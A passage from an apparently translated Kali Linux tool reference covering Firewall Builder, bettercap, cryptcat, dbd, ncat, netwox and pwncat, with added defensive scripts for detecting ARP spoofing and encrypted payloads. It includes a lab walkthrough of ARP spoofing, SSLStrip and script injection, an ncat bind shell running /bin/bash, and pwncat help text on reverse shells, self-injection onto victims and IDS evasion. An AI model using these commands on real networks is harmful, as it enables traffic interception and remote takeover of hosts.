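7 - 192.168.11.3:12345 > 192.168.65.3:24 S TCP 0
8 - 192.168.11.3:12345 > 192.168.65.3:25 S TCP 0
9 - 192.168.11.3:80 > 192.168.0.3:12345 PA TCP
"""
SNIFFER_LOG = """
1 - 192.168.0.1:12345 > 192.168.0.3:80 S TCP 0
2 - 192.168.0.1:12345 > 192.168.0.3:443 S TCP 0
5 - 192.168.0.1:12345 > 192.168.0.3:22 S TCP 0
9 - 192.168.11.3:80 > 192.168.0.3:12345 PA TCP 0
"""

LINE_RE = re.compile(r'^(?P<num>\d+) - (?P<src>\S+) > (?P<dst>\S+) '
                     r'(?P<flags>\S+) (?P<proto>\S+)(?: (?P<tos>\S+))?$')


def parse_log(text):
    """Map packet number -> fields for every 'N - src > dst FLAGS PROTO [TOS]' line."""
    packets = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        src_ip, src_port = m.group("src").rsplit(":", 1)
        dst_ip, dst_port = m.group("dst").rsplit(":", 1)
        packets[int(m.group("num"))] = {
            "src_ip": src_ip, "src_port": int(src_port),
            "dst_ip": dst_ip, "dst_port": int(dst_port),
            "flags": m.group("flags"), "proto": m.group("proto"), "tos": m.group("tos"),
        }
    return packets


def classify(sent, seen):
    """Split sent packets into authorized (seen unchanged), modified, filtered.

    A packet seen with different addresses is reported as modified (NAT);
    packet 9 differs only in the TOS the sniffer recorded, so a strict field
    comparison lists it as modified, matching the page's freport output.
    """
    result = {"authorized": [], "modified": [], "filtered": []}
    for num in sorted(sent):
        if num not in seen:
            result["filtered"].append(num)
        elif seen[num] == sent[num]:
            result["authorized"].append(num)
        else:
            result["modified"].append(num)
    return result


def evaluate_policy(sent, classified, allowed_ports):
    """Check connection attempts (SYN only) against the intended allow list."""
    delivered = classified["authorized"] + classified["modified"]
    violations = [n for n in delivered
                  if sent[n]["flags"] == "S" and sent[n]["dst_port"] not in allowed_ports]
    unexpected_blocks = [n for n in classified["filtered"]
                         if sent[n]["flags"] == "S" and sent[n]["dst_port"] in allowed_ports]
    return {"violations": sorted(violations), "unexpected_blocks": sorted(unexpected_blocks)}


if __name__ == "__main__":
    sent, seen = parse_log(GENERATOR_LOG), parse_log(SNIFFER_LOG)
    outcome = classify(sent, seen)
    print(outcome)
    print(evaluate_policy(sent, outcome, {22, 80, 443}))
```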
Firewall Builder
Creates, compiles and installs firewall rules from a GUI. The following products are supported:
- iptables
- ipfw
- ipfilter
- PF
- Cisco ASA/PIX/FWSM
- Cisco router ACL
- Juniper Junos ACL
■ Example
root@kali:~# fwbuilder
Firewall Builder GUI 5.3.7
Create the iptables rules in the GUI.
When you run the compile, a startup script named <any file name>.fw is created in the save location; place it on the server manually or install it from the GUI with the install command (SCP).
# Before running the script (no rules set)
root@kali:~# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
# Run the script (start)
root@kali:~# /etc/init.d/kali.fw start
Activating firewall script generated Wed Oct 9 05:08:38 2024 by root
Running prolog script
[...]
# The settings have been applied
root@kali:~# iptables -L
Chain INPUT (policy DROP)
target prot opt source destination
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
In_RULE_0 tcp -- 192.168.11.4 anywhere tcp dpt:ssh
In_RULE_1 tcp -- anywhere anywhere tcp dpt:ssh
Chain FORWARD (policy DROP)
target prot opt source destination
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
In_RULE_0 tcp -- 192.168.11.4 anywhere tcp dpt:ssh
In_RULE_1 tcp -- anywhere anywhere tcp dpt:ssh
Chain OUTPUT (policy DROP)
target prot opt source destination
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
Chain In_RULE_0 (2 references)
target prot opt source destination
LOG all -- anywhere anywhere LOG level info prefix "RULE 0 -- CUSTOM "
ACCEPT all -- anywhere anywhere
Chain In_RULE_1 (2 references)
target prot opt source destination
LOG all -- anywhere anywhere LOG level info prefix "RULE 1 -- DENY "
DROP all -- anywhere anywhere
# Run the script (stop)
root@kali:~# /etc/init.d/kali.fw stop
# The configuration has been reset
root@kali:~# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Multi-purpose Toolkit
bettercap
A network security framework for reconnaissance and attacks against several kinds of targets: IPv4/IPv6 networks, Wi-Fi networks, BLE devices and more.
■ Usage
root@kali:~# bettercap --help
Usage of bettercap:
-autostart string
Comma separated list of modules to auto start. (default "events.stream")
-caplet string
Read commands from this file and execute them in the interactive session.
-caplets-path string
Specify an alternative base path for caplets.
-cpu-profile file
Write cpu profile file.
-debug
Print debug messages.
-env-file string
Load environment variables from this file if found, set to empty to disable environment persistence.
-eval string
Run one or more commands separated by ; in the interactive session, used to set variables via command line.
-gateway-override string
Use the provided IP address instead of the default gateway. If not specified or invalid, the default gateway will be used.
-iface string
Network interface to bind to, if empty the default interface will be auto selected.
-mem-profile file
Write memory profile to file.
-no-colors
Disable output color effects.
-no-history
Disable interactive session history file.
-pcap-buf-size int
PCAP buffer size, leave to 0 for the default value. (default -1)
-script string
Load a session script.
-silent
Suppress all logs which are not errors.
-version
Print the version and exit.
■ Usage example
# Start bettercap on the attacker host
root@kali_1:~# bettercap
192.168.0.0/16 > 192.168.11.3 » [03:33:17] [sys.log] [inf] gateway monitor started ...
# Discover hosts on the network
192.168.0.0/16 > 192.168.11.3 » net.recon on
192.168.0.0/16 > 192.168.11.3 » [07:01:21] [endpoint.new] endpoint 192.168.11.4 detected as 02:42:ac:12:00:04.
# Start the HTTP proxy (injects JavaScript code into responses)
192.168.0.0/16 > 192.168.11.3 » set http.proxy.injectjs alert("Hello World")
192.168.0.0/16 > 192.168.11.3 » set http.proxy.sslstrip true
192.168.0.0/16 > 192.168.11.3 » http.proxy on
192.168.0.0/16 > 192.168.11.3 » [07:01:46] [sys.log] [inf] http.proxy started on 192.168.11.3:8080 (sslstrip enabled)
# Run ARP spoofing against the target host
192.168.0.0/16 > 192.168.11.3 » set arp.spoof.targets 192.168.11.4
192.168.0.0/16 > 192.168.11.3 » set arp.spoof.fullduplex true
192.168.0.0/16 > 192.168.11.3 » arp.spoof on
192.168.0.0/16 > 192.168.11.3 » [07:02:02] [sys.log] [war] arp.spoof full duplex spoofing enabled, if the router has ARP spoofing mechanisms, the attack will fail.
192.168.0.0/16 > 192.168.11.3 » [07:02:02] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.
# Starting the HTTP proxy automatically adds a rule to iptables
root@kali_1:~# iptables -t nat -L PREROUTING
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
DNAT tcp -- anywhere anywhere tcp dpt:http to:192.168.11.3:8080
# On the target host, send an HTTP request to an external site
# Because of the ARP spoofing, the request passes through the attacker host's HTTP proxy, SSLStrip upgrades it to HTTPS upstream, and the JavaScript code is injected into the external site's response
root@kali_2:~# curl -L http://qiita.com
[...]
<noscript><link crossorigin="anonymous" href="http://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha512-SfTiTlX6kk+qitfevl/7LibUOeJWlt9rbyDn92a1DqWOw9vWG2MFoays0sgObmWazO5BQPiFucnnEAjpAB+/Sw==" referrerpolicy="no-referrer" rel="stylesheet" /></noscript>
<script type="text/javascript">alert(Hello World)</script>
</head>
[...]
root@kali_1:~# bettercap
[...]
192.168.0.0/16 > 192.168.11.3 » [07:02:02] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.
192.168.0.0/16 > 192.168.11.3 » [07:02:18] [sys.log] [inf] [sslstrip] Got redirection from HTTP to HTTPS: http://qiita.com -> https://qiita.com
192.168.0.0/16 > 192.168.11.3 » [07:02:18] [sys.log] [inf] http.proxy > injecting javascript (65 bytes) into qiita.com/ (167 bytes) for 192.168.11.4
192.168.0.0/16 > 192.168.11.3 » [07:02:18] [sys.log] [inf] [sslstrip] Replacing host qiita.com with qiita.com in request from 192.168.11.4:44038 and transmitting HTTPS
192.168.0.0/16 > 192.168.11.3 » [07:02:19] [sys.log] [inf] [sslstrip] Stripping 65 SSL links from qiita.com
192.168.0.0/16 > 192.168.11.3 » [07:02:19] [sys.log] [inf] [sslstrip] Fixing cookies on qiita.com
192.168.0.0/16 > 192.168.11.3 » [07:02:19] [sys.log] [inf] http.proxy > injecting javascript (65 bytes) into qiita.com/ (290066 bytes) for 192.168.11.4
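From the defender's side, the chain above leaves a visible trace on the wire: ARP replies that rebind the gateway's and the target's IP addresses to the attacker's MAC, which is exactly what full-duplex arp.spoof has to do. The following added example (not part of the original post or of bettercap) keeps an IP-to-MAC table and flags such rebindings over a constructed list of ARP records; the IPs reuse the lab addresses above, the MACs and timestamps are made up.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass(frozen=True)
class ArpReply:
    """Sender fields of one ARP reply (or gratuitous request)."""
    ts: str   # constructed timestamp
    ip: str   # sender protocol address: the IP being claimed
    mac: str  # sender hardware address: the MAC claiming it


# Constructed records (not a real capture). The gateway 192.168.11.1 and the
# target 192.168.11.4 are first seen with their own MACs; then 192.168.11.3, the
# attacker host above, claims both addresses, as arp.spoof with fullduplex does.
ARP_RECORDS = [
    ArpReply("07:01:20", "192.168.11.1", "02:42:ac:12:00:01"),
    ArpReply("07:01:21", "192.168.11.4", "02:42:ac:12:00:04"),
    ArpReply("07:01:25", "192.168.11.3", "02:42:ac:12:00:03"),
    ArpReply("07:02:02", "192.168.11.4", "02:42:ac:12:00:03"),
    ArpReply("07:02:02", "192.168.11.1", "02:42:ac:12:00:03"),
    ArpReply("07:02:03", "192.168.11.4", "02:42:ac:12:00:04"),  # real host still answers
]


def detect_arp_spoof(records: List[ArpReply], gateway_ip: str) -> Dict[str, object]:
    """Flag IPs that get rebound to a new MAC, and MACs that claim several IPs.

    A rebinding of the gateway address is the strongest signal for the
    full-duplex case above. One MAC claiming many IPs is weaker evidence on its
    own (a router may legitimately hold several addresses), so it is reported
    separately for the analyst to weigh.
    """
    macs_for_ip: Dict[str, Set[str]] = defaultdict(set)
    ips_for_mac: Dict[str, Set[str]] = defaultdict(set)
    rebinds = []
    for r in records:
        if macs_for_ip[r.ip] and r.mac not in macs_for_ip[r.ip]:
            rebinds.append({
                "ts": r.ts,
                "ip": r.ip,
                "old_macs": sorted(macs_for_ip[r.ip]),
                "new_mac": r.mac,
                "severity": "high" if r.ip == gateway_ip else "medium",
            })
        macs_for_ip[r.ip].add(r.mac)
        ips_for_mac[r.mac].add(r.ip)
    multi = {m: ips for m, ips in ips_for_mac.items() if len(ips) > 1}
    return {"rebinds": rebinds, "multi_ip_macs": multi}


if __name__ == "__main__":
    result = detect_arp_spoof(ARP_RECORDS, gateway_ip="192.168.11.1")
    for alert in result["rebinds"]:
        print(f"[{alert['severity']}] {alert['ts']} {alert['ip']} moved "
              f"{alert['old_macs']} -> {alert['new_mac']}")
    print("MACs claiming several IPs:", result["multi_ip_macs"])
```

The same table can be fed from a live ARP capture or from switch DHCP-snooping/ARP-inspection logs; the detection logic does not change.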
Cryptcat
A clone of netcat with Twofish encryption built in.
■ Usage
root@kali:~# cryptcat -h
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive]
■ Usage example
# Start host 1 in listen mode (shared secret: hello)
root@kali_1:~# cryptcat -k hello -l -p 4444
# Send data from host 2 to host 1
root@kali_2:~# cryptcat -k hello 192.168.11.3 4444
hello
# The traffic is encrypted
root@kali_1:~# tcpdump -n -A -i eth0
06:08:53.194279 IP 192.168.11.4.51566 > 192.168.11.3.4444: Flags [P.], seq 221508907:221508923, ack 2778846694, win 502, options [nop,nop,TS val 1303472439 ecr 1186926670], length 16
E..D.)@.@..a.........n.\.3.+........X`.....
M.i7F..NH.(..<o`..s.i
W`
# With netcat, the same data is sent in plaintext
root@kali_1:~# tcpdump -n -A -i eth0
06:10:20.289697 IP 192.168.11.4.42856 > 192.168.11.3.4444: Flags [P.], seq 2016164085:2016164091, ack 3696696589, win 502, options [nop,nop,TS val 1303559539 ecr 1187034921], length 6
E..:,.@.@............h.\x,8..W......XV.....
M..sF..)hello
dbd
A clone of netcat with AES-CBC-128 + HMAC-SHA1 encryption built in.
■ Usage
root@kali:~# dbd -h
connect (tcp): dbd [-options] host port
listen (tcp): dbd -l -p port [-options]
options:
-l listen for incoming connection
-p n choose port to listen on, or source port to connect out from
-a address choose an address to listen on or connect out from
-e prog program to execute after connect (e.g. -e cmd.exe or -e bash)
-r n infinitely respawn/reconnect, pause for n seconds between
connection attempts. -r0 can be used to re-listen after
disconnect (just like a regular daemon)
-c on|off encryption on/off. specify whether you want to use the built-in
AES-CBC-128 + HMAC-SHA1 encryption implementation (by
Christophe Devine - http://www.cr0.net:8040/) or not
default is: -c on
-k secret override default phrase to use for encryption (secret must be
shared between client and server)
-q hush, quiet, don't print anything (overrides -v)
-v be verbose
-n toggle numeric-only IP addresses (don't do DNS resolution). if
you specify -n twice, original state will be active (i.e. -n
works like a on/off switch)
-m toggle monitoring (snooping) on/off (only used with the -e
option). snooping can also be turned on by specifying -vv (-v
two times)
-P prefix add prefix (+ a hardcoded separator) to all outbound data.
this option is mostly only useful for dbd in "chat mode" (to
prefix lines you send with your nickname)
-H on|off highlight incoming data with a hardcoded (color) escape
sequence (for e.g. chatting). default is: -H off
-V print version banner and exit (include that output in your
bug report and send bug report to michel.blomgren@tigerteam.se)
unix-like OS specific options:
-s invoke a shell, nothing else. if dbd is setuid 0, it'll invoke
a root shell
-w n "immobility timeout" in seconds for idle read/write operations
and program execution (the -e option)
-D on|off fork and run in background (daemonize). default: -D off
■ Usage example
# Start host 1 in listen mode (shared secret: hello)
root@kali_1:~# dbd -k hello -l -p 4444
# Send data from host 2 to host 1
root@kali_2:~# dbd -k hello 192.168.11.3 4444
hello
# The traffic is encrypted
root@kali_1:~# tcpdump -n -A -i eth0
07:07:13.657017 IP 192.168.11.4.47676 > 192.168.11.3.4444: Flags [P.], seq 401500837:401500873, ack 2018669106, win 502, options [nop,nop,TS val 1306973150 ecr 1190446901], length 36
E..X.9@.@.2=.........<.\..j.xRr2....Xt.....
M...F..5.8c..(.d...F._F..&.v[....(.....^1n.:
# With netcat, the same data is sent in plaintext
root@kali_1:~# tcpdump -n -A -i eth0
07:08:32.684187 IP 192.168.11.4.53998 > 192.168.11.3.4444: Flags [P.], seq 2097202315:2097202321, ack 1718728373, win 502, options [nop,nop,TS val 1307052182 ecr 1190526777], length 6
E..:;.@.@.. ...........\}...fq......XV.....
M...F..9hello
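The tcpdump comparisons above (for cryptcat and again for dbd) make the point visually: the encrypted payload has no readable structure while the netcat payload is the literal string. A monitoring rule can score that automatically with byte entropy and the share of printable bytes, with one caveat the captures also show: a 6-byte payload is too short for entropy to mean anything, so a minimum length is needed. The function below is an added example, not code from either tool; both sample payloads are constructed, not the bytes from the captures.

```python
import math
import string
from typing import Dict

PRINTABLE = frozenset(string.printable.encode())


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte, from the byte-value histogram."""
    if not data:
        return 0.0
    counts: Dict[int, int] = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are ASCII printable or whitespace."""
    return sum(1 for b in data if b in PRINTABLE) / len(data) if data else 0.0


def score_payload(data: bytes, min_len: int = 16) -> Dict[str, object]:
    """Score one TCP payload as plaintext or likely-encrypted.

    Entropy is bounded by log2(len) for short payloads, so it is compared
    against that bound rather than against 8 bits; below min_len the sample is
    too small to judge (the netcat 'hello' payload above is only 6 bytes).
    """
    if len(data) < min_len:
        return {"verdict": "too-short", "len": len(data)}
    h = shannon_entropy(data)
    h_max = math.log2(min(len(data), 256))
    p = printable_ratio(data)
    encrypted = p < 0.7 and h / h_max >= 0.85
    return {
        "verdict": "likely-encrypted" if encrypted else "plaintext",
        "len": len(data),
        "entropy": round(h, 3),
        "entropy_max": round(h_max, 3),
        "printable_ratio": round(p, 3),
    }


# Constructed samples (not the bytes from the tcpdump output above).
PLAINTEXT_SAMPLE = b"hello from host 2, sent over plain netcat\n"
# 36 bytes (the dbd payload length above) of deterministic, uniformly spread
# byte values standing in for a ciphertext; a real one would be random.
CIPHERTEXT_SAMPLE = bytes((i * 97 + 31) % 256 for i in range(36))


if __name__ == "__main__":
    for name, payload in [("nc hello", b"hello\n"),
                          ("plaintext", PLAINTEXT_SAMPLE),
                          ("ciphertext", CIPHERTEXT_SAMPLE)]:
        print(name, score_payload(payload))
```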
Ncat
A network tool that extends netcat's feature set. It supports connection chaining, redirecting both TCP and UDP ports to other sites, SSL, and proxied connections through a SOCKS4 or HTTP proxy.
■ Usage
root@kali:~# ncat --help
Usage: ncat [options] [hostname] [port]
Options taking a time assume seconds. Append 'ms' for milliseconds,
's' for seconds, 'm' for minutes, or 'h' for hours (e.g. 500ms).
-4 Use IPv4 only
-6 Use IPv6 only
-U, --unixsock Use Unix domain sockets only
--vsock Use vsock sockets only
-C, --crlf Use CRLF for EOL sequence
-c, --sh-exec <command> Executes the given command via /bin/sh
-e, --exec <command> Executes the given command
--lua-exec <filename> Executes the given Lua script
-g hop1[,hop2,...] Loose source routing hop points (8 max)
-G <n> Loose source routing hop pointer (4, 8, 12, ...)
-m, --max-conns <n> Maximum <n> simultaneous connections
-h, --help Display this help screen
-d, --delay <time> Wait between read/writes
-o, --output <filename> Dump session data to a file
-x, --hex-dump <filename> Dump session data as hex to a file
-i, --idle-timeout <time> Idle read/write timeout
-p, --source-port port Specify source port to use
-s, --source addr Specify source address to use (doesn't affect -l)
-l, --listen Bind and listen for incoming connections
-k, --keep-open Accept multiple connections in listen mode
-n, --nodns Do not resolve hostnames via DNS
-t, --telnet Answer Telnet negotiations
-u, --udp Use UDP instead of default TCP
--sctp Use SCTP instead of default TCP
-v, --verbose Set verbosity level (can be used several times)
-w, --wait <time> Connect timeout
-z Zero-I/O mode, report connection status only
--append-output Append rather than clobber specified output files
--send-only Only send data, ignoring received; quit on EOF
--recv-only Only receive data, never send anything
--no-shutdown Continue half-duplex when receiving EOF on stdin
--allow Allow only given hosts to connect to Ncat
--allowfile A file of hosts allowed to connect to Ncat
--deny Deny given hosts from connecting to Ncat
--denyfile A file of hosts denied from connecting to Ncat
--broker Enable Ncat's connection brokering mode
--chat Start a simple Ncat chat server
--proxy <addr[:port]> Specify address of host to proxy through
--proxy-type <type> Specify proxy type ("http", "socks4", "socks5")
--proxy-auth <auth> Authenticate with HTTP or SOCKS proxy server
--proxy-dns <type> Specify where to resolve proxy destination
--ssl Connect or listen with SSL
--ssl-cert Specify SSL certificate file (PEM) for listening
--ssl-key Specify SSL private key (PEM) for listening
--ssl-verify Verify trust and domain name of certificates
--ssl-trustfile PEM file containing trusted SSL certificates
--ssl-ciphers Cipherlist containing SSL ciphers to use
--ssl-servername Request distinct server name (SNI)
--ssl-alpn ALPN protocol list to use
--version Display Ncat's version information and exit
■ Usage example
# Connect to an SMTP server and talk to it interactively
root@kali:~# ncat 192.168.11.4 25
220 server4test.localdomain ESMTP Postfix (Ubuntu)
VRFY hello@localhost
252 2.0.0 hello@localhost
QUIT
221 2.0.0 Bye
# On host A, listen on port 8081 for commands
root@kali_a:~# ncat --exec "/bin/bash" -l 8081 --keep-open
# From host B, connect to port 8081 on host A and send a command
root@kali_b:~# ncat 192.168.11.4 8081
hostname
kali_a
# Have host A listen and write the received data to a file
root@kali_a:~# ncat -l > hello.txt
# Send a file from host B to host A
root@kali_b:~# ncat --send-only 192.168.11.3 < hello.txt
netwox
Provides more than 200 network-related utilities. The tools are grouped into the following categories.
- information
- network protocol
- application protocol
- sniff (capture network packets)
- spoof (create and send packets)
- record (file containing captured packets)
- client
- server
- ping (check if a computer if reachable)
- traceroute (obtain list of gateways)
- scan (computer and port discovery)
- network audit
- brute force (check if passwords are weak)
- remote administration
- tools not related to network
■ Usage
root@kali:~# man netwox
SYNOPSIS
netwox number [ parameters... ]
netwox number --help
netwox number --help2
netwox
DESCRIPTION
number number of the tool to use
parameters
parameters for the chosen tool number. Parameter --help shows help. Parameter --help2 shows description.
When using netwox without number and parameters, it enters interactive help mode. In this mode, the user has to select a category by
pressing a key. Then by choosing a tool number, its corresponding usage is displayed. Note: netwag is easier than interactive help mode.
■ Usage example
# Start in interactive mode
root@kali:~# netwox
######################## MAIN MENU #########################
[...]
a + information
b + network protocol
c + application protocol
d + sniff (capture network packets)
e + spoof (create and send packets)
f + record (file containing captured packets)
g + client
h + server
i + ping (check if a computer if reachable)
j + traceroute (obtain list of gateways)
k + scan (computer and port discovery)
l + network audit
m + brute force (check if passwords are weak)
n + remote administration
o + tools not related to network
Select a node (key in 03456abcdefghijklmno): g
########################## client ##########################
[...]
a + UDP client
b + TCP client
Select a node (key in 0123456ab): b
######################## TCP client ########################
[...]
a + generic TCP client
b + DNS (tcp) client
c + FTP client
d + HTTP client
e + IDENT client
f + IRC client
g + NNTP client
h + SMB client
i + SMTP client
j + TELNET client
k + WHOIS client
Select a node (key in 0123456abcdefghijk): h
######################## SMB client ########################
[...]
a - 198:SMB/CIFS client: list shares
b - 199:SMB/CIFS client: create a directory
c - 200:SMB/CIFS client: delete a directory
d - 201:SMB/CIFS client: rename a directory
e - 202:SMB/CIFS client: list contents of a directory
f - 203:SMB/CIFS client: delete a file
g - 204:SMB/CIFS client: rename a file
h - 205:SMB/CIFS client: get a file
i - 206:SMB/CIFS client: put a file
j - 207:SMB/CIFS client: recursively get a directory
k - 208:SMB/CIFS client: recursively put a directory
l - 209:SMB/CIFS client: recursively delete a directory
Select a node (key in 0123456abcdefghijkl): a
################# help for tool number 198 #################
Title: SMB/CIFS client: list shares
[...]
Synonyms: smbclient
Usage: netwox 198 -i ip [-u login] [-w password] [-N netbiosname] [-d device] [-E eth] [-e eth] [-I ip] [-P port] [-p port] [-o ip4opts] [-O ip6exts] [-v uint32] [-T uint32] [-V|+V] [-D|+D]
Parameters:
-i|--dst-ip ip destination IP address {5.6.7.8}
-u|--user login username
-w|--password password password
-N|--netbiosname netbiosname server NetBIOS NAME
-d|--device device device name {Eth0}
-E|--src-eth eth source ethernet address {0:2:3:4:5:6}
-e|--dst-eth eth destination ethernet address {0:8:9:a:b:c}
-I|--src-ip ip source IP address {192.168.11.3}
-P|--src-port port source port number {0}
-p|--dst-port port destination port number {139}
-o|--ip4opts ip4opts IPv4 options
-O|--ip6exts ip6exts IPv6 extensions
-v|--authversion uint32 0=Lanman, 1=NTLMv1, 2=NTLMv2, unset=best {2}
-T|--timeout uint32 timeout in milliseconds {60000}
-V|--verbose|+V|--no-verbose display SMB trace
-D|--debug|+D|--no-debug display SMB packets
Example: netwox 198 -i "5.6.7.8"
Example: netwox 198 --dst-ip "5.6.7.8"
Press 'r' or 'k' to run this tool, or any other key to continue
netwox 198 -i 192.168.11.4 -u hello -w hello
share=print$
comment=Printer Drivers
sharetype=0
share=tmp
comment=oh noes!
sharetype=0
share=opt
comment=
sharetype=0
share=IPC$
comment=IPC Service (b776fbd9255f server (Samba 3.0.20-Debian))
sharetype=3
share=ADMIN$
comment=IPC Service (b776fbd9255f server (Samba 3.0.20-Debian))
sharetype=3
share=hello
comment=Home Directories
sharetype=0
Command returned 0 (OK)
pwncat
A network tool that extends Netcat's feature set. It provides bind and reverse shells, self-injecting shells, port forwarding and more.
■ Usage
root@kali:~# pwncat --help
usage: pwncat [options] hostname port
pwncat [options] -l [hostname] port
pwncat [options] -z hostname port
pwncat [options] -L [addr:]port hostname port
pwncat [options] -R addr:port hostname port
pwncat -V, --version
pwncat -h, --help
positional arguments:
hostname Address to listen, forward, scan or connect to.
port [All modes]
Single port to listen, forward or connect to.
[Zero-I/O mode]
Specify multiple ports to scan:
Via list: 4444,4445,4446
Via range: 4444-4446
Via incr: 4444+2
mode arguments:
-l, --listen [Listen mode]:
Start a server and listen for incoming connections.
If using TCP and a connected client disconnects or the
connection is interrupted otherwise, the server will
quit. See -k/--keep-open to change this behaviour.
-z, --zero [Zero-I/0 mode]:
Connect to a remote endpoint and report status only.
Used for port scanning.
See --banner for version detection.
-L [addr:]port, --local [addr:]port
[Local forward mode]:
This mode will start a server and a client internally.
The internal server will listen locally on specified
addr/port (given by --local [addr:]port).
The server will then forward traffic to the internal
client which connects to another server specified by
hostname/port given via positional arguments.
(I.e.: proxies a remote service to a local address)
-R addr:port, --remote addr:port
[Remote forward mode]:
This mode will start two clients internally. One is
connecting to the target and one is connecting to
another pwncat/netcat server you have started some-
where. Once connected, it will then proxy traffic
between you and the target.
This mode should be applied on machines that block
incoming traffic and only allow outbound.
The connection to your listening server is given by
-R/--remote addr:port and the connection to the
target machine via the positional arguments.
optional arguments:
-e cmd, --exec cmd Execute shell command. Only for connect or listen mode.
-C lf, --crlf lf Specify, 'lf', 'crlf' or 'cr' to always force replacing
line endings for input and outout accordingly. Specify
'no' to completely remove any line feeds. By default
it will not replace anything and takes what is entered
(usually CRLF on Windows, LF on Linux and some times
CR on MacOS).
-n, --nodns Do not resolve DNS.
--send-on-eof Buffer data received on stdin until EOF and send
everything in one chunk.
--no-shutdown Do not shutdown into half-duplex mode.
If this option is passed, pwncat won't invoke shutdown
on a socket after seeing EOF on stdin. This is provided
for backward-compatibility with OpenBSD netcat, which
exhibits this behavior.
-v, --verbose Be verbose and print info to stderr. Use -v, -vv, -vvv
or -vvvv for more verbosity. The server performance will
decrease drastically if you use more than three times.
--info type Show additional info about sockets, IPv4/6 or TCP opts
applied to the current socket connection. Valid
parameter are 'sock', 'ipv4', 'ipv6', 'tcp' or 'all'.
Note, you must at least be in INFO verbose mode in order
to see them (-vv).
-c str, --color str Colored log output. Specify 'always', 'never' or 'auto'.
In 'auto' mode, color is displayed as long as the output
goes to a terminal. If it is piped into a file, color
will automatically be disabled. This mode also disables
color on Windows by default. (default: auto)
--safe-word str All modes:
If pwncat is started with this argument, it will shut
down as soon as it receives the specified string. The
--keep-open (server) or --reconn (client) options will
be ignored and it won't listen again or reconnect to you.
Use a very unique string to not have it shut down
accidentally by other input.
protocol arguments:
-4 Only Use IPv4 (default: IPv4 and IPv6 dualstack).
-6 Only Use IPv6 (default: IPv4 and IPv6 dualstack).
-u, --udp Use UDP for the connection instead of TCP.
-T str, --tos str Specifies IP Type of Service (ToS) for the connection.
Valid values are the tokens 'mincost', 'lowcost',
'reliability', 'throughput' or 'lowdelay'.
--http Connect / Listen mode (TCP and UDP):
Hide traffic in http packets to fool Firewalls/IDS/IPS.
--https Connect / Listen mode (TCP and UDP):
Hide traffic in https packets to fool Firewalls/IDS/IPS.
-H [str ...], --header [str ...]
Add HTTP headers to your request when using --http(s).
command & control arguments:
--self-inject cmd:host:port[s]
Listen mode (TCP only):
If you are about to inject a reverse shell onto the
victim machine (via php, bash, nc, ncat or similar),
start your listening server with this argument.
This will then (as soon as the reverse shell connects)
automatically deploy and background-run an unbreakable
pwncat reverse shell onto the victim machine which then
also connects back to you with specified arguments.
Example: '--self-inject /bin/bash:10.0.0.1:4444'
It is also possible to launch multiple reverse shells by
specifying multiple ports.
Via list: --self-inject /bin/sh:10.0.0.1:4444,4445,4446
Via range: --self-inject /bin/sh:10.0.0.1:4444-4446
Via incr: --self-inject /bin/sh:10.0.0.1:4444+2
Note: this is currently an experimental feature and does
not work on Windows remote hosts yet.
pwncat scripting engine:
--script-send file All modes (TCP and UDP):
A Python scripting engine to define your own custom
transformer function which will be executed before
sending data to a remote endpoint. Your file must
contain the exact following function which will:
be applied as the transformer:
def transform(data, pse):
# NOTE: the function name must be 'transform'
# NOTE: the function param name must be 'data'
# NOTE: indentation must be 4 spaces
# ... your transformations goes here
return data
You can also define as many custom functions or classes
within this file, but ensure to prefix them uniquely to
not collide with pwncat's function or classes, as the
file will be called with exec().
--script-recv file All modes (TCP and UDP):
A Python scripting engine to define your own custom
transformer function which will be executed after
receiving data from a remote endpoint. Your file must
contain the exact following function which will:
be applied as the transformer:
def transform(data, pse):
# NOTE: the function name must be 'transform'
# NOTE: the function param name must be 'data'
# NOTE: indentation must be 4 spaces
# ... your transformations goes here
return data
You can also define as many custom functions or classes
within this file, but ensure to prefix them uniquely to
not collide with pwncat's function or classes, as the
file will be called with exec().
zero-i/o mode arguments:
--banner Zero-I/O (TCP and UDP):
Try banner grabbing during port scan.
listen mode arguments:
-k, --keep-open Listen mode (TCP only):
Re-accept new clients in listen mode after a client has
disconnected or the connection is interrupted otherwise.
(default: server will quit after connection is gone)
--rebind [x] Listen mode (TCP and UDP):
If the server is unable to bind, it will re-initialize
itself x many times before giving up. Omit the
quantifier to rebind endlessly or specify a positive
integer for how many times to rebind before giving up.
See --rebind-robin for an interesting use-case.
(default: fail after first unsuccessful try).
--rebind-wait s Listen mode (TCP and UDP):
Wait x seconds between re-initialization. (default: 1)
--rebind-robin port Listen mode (TCP and UDP):
If the server is unable to initialize (e.g: cannot bind
and --rebind is specified, it it will shuffle ports in
round-robin mode to bind to.
Use comma separated string such as '80,81,82,83', a range
of ports '80-83' or an increment '80+3'.
Set --rebind to at least the number of ports to probe +1
This option requires --rebind to be specified.
connect mode arguments:
